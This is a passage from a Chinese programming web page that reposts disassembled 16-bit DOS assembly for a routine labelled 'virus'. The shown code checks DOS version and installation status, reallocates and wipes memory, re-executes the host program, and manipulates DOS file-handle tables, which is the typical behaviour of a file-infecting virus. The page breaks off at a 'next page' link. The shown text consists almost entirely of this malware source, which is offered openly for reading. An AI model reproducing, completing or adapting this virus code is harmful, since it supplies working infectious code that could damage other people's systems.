+设为首页 +添加到收藏夹
data_2e equ 6 ; (0000:0006=70h) 【程序编程相关:关于token控件的设想】
data_1e equ 4 ; (0000:0004=7fbh) 【推荐阅读:缓冲区溢出(二)】
data_4e equ 84h ; (0000:0084=16h) 【扩展信息:缓冲区溢出(一)】
data_3e equ 4ch ; (0000:004c=88h)
data_6e equ 0ah ; (0046:000a=0)
data_7e equ 16h ; (0046:0016=0)
data_8e equ 2ch ; (0046:002c=50h)
data_9e equ 8abh ; (0046:08ab=4146h)
data_10e equ 8adh ; (0046:08ad=3154h)
data_11e equ 0ah ; (08d4:000a=2f9h)
data_12e equ 0ch ; (08d4:000c=3872h)
data_13e equ 100h ; (08d4:0100=0dfh)
data_14e equ 1 ; (4815:0001=0ffffh)
data_15e equ 100h ; (4816:0100=0ffh)
data_16e equ 1 ; (8343:0001=0ffffh)
data_17e equ 0ah ; (8344:000a=0)
data_18e equ 0eh ; (8344:000e=8344h)
data_49e equ 900h ; (8344:0900=0)
data_50e equ 902h ; (8344:0902=0)
data_51e equ 904h ; (8344:0904=8344h)
data_52e equ 906h ; (8344:0906=0)
data_53e equ 9efh ; (8344:09ef=0)
data_54e equ 10afh ; (8344:10af=0)
data_55e equ 10b1h ; (8344:10b1=0)
data_56e equ 10b3h ; (8344:10b3=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
virus proc far
start:
mov ah,30h ; 0
int 21h ; dos services ah=function 30h
; get dos version number ax
cmp al,3
jb loc_1 ; jump if below
mov ax,1200h
int 2fh ; multiplex/spooler al=func 00h
; get installed status
cmp al,0ffh
loc_1:
mov ax,0bh
jc loc_4 ; jump if carry set
mov ah,4ah ; j
mov bx,140h
int 21h ; dos services ah=function 4ah
; change mem allocation, bx=siz
jc loc_4 ; jump if carry set
cli ; disable interrupts
push cs
pop ss
mov sp,13feh
call sub_1 ; (01eb)
sti ; enable interrupts
mov ax,ds:data_8e ; (0046:002c=50h)
or ax,ax ; zero ?
jz loc_5 ; jump if zero
call sub_13 ; (07ec)
mov es,ax
xor di,di ; zero register
xor ax,ax ; zero register
loc_2:
scasw ; scan es:[di] for ax
jnz loc_2 ; jump if not zero
scasw ; scan es:[di] for ax
mov dx,di
push es
pop ds
mov ah,48h ; h
mov bx,0ffffh
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov ah,48h ; h
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov es,ax
mov ah,49h ; i
int 21h ; dos services ah=function 49h
; release memory block, es=seg
xor ax,ax ; zero register
mov cx,bx
mov bx,es
locloop_3:
push cx
mov cx,8
xor di,di ; zero register
rep stosw ; rep when cx >0 store ax to es:[di]
inc bx
mov es,bx
pop cx
loop locloop_3 ; loop if cx > 0
push cs
pop es
mov bx,data_51e ; (8344:0904=44h)
mov di,bx
stosw ; store ax to es:[di]
mov al,80h
stosw ; store ax to es:[di]
mov ax,cs
stosw ; store ax to es:[di]
mov ax,5ch
stosw ; store ax to es:[di]
mov ax,cs
stosw ; store ax to es:[di]
mov ax,6ch
stosw ; store ax to es:[di]
mov ax,cs
stosw ; store ax to es:[di]
mov ax,4b00h
int 21h ; dos services ah=function 4bh
; run progm @ds:dx, parm @es:bx
loc_4:
push cs
pop ds
call sub_13 ; (07ec)
jmp dword ptr cs:data_17e ; (8344:000a=0)
loc_5:
mov ax,1220h
mov bx,5
int 2fh ; ??int non-standard interrupt.
push bx
dec bx
dec bx
mov es:[di],bl
mov ax,1216h
int 2fh ; ??int non-standard interrupt.
dec bx
dec bx
mov es:[di],bx
mov ah,48h ; h
mov bx,0ffffh
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov ah,48h ; h
int 21h ; dos services ah=function 48h
; allocate memory, bx=bytes/16
mov ds,ax
pop bx
mov ax,4200h
xor cx,cx ; zero register
... 下一页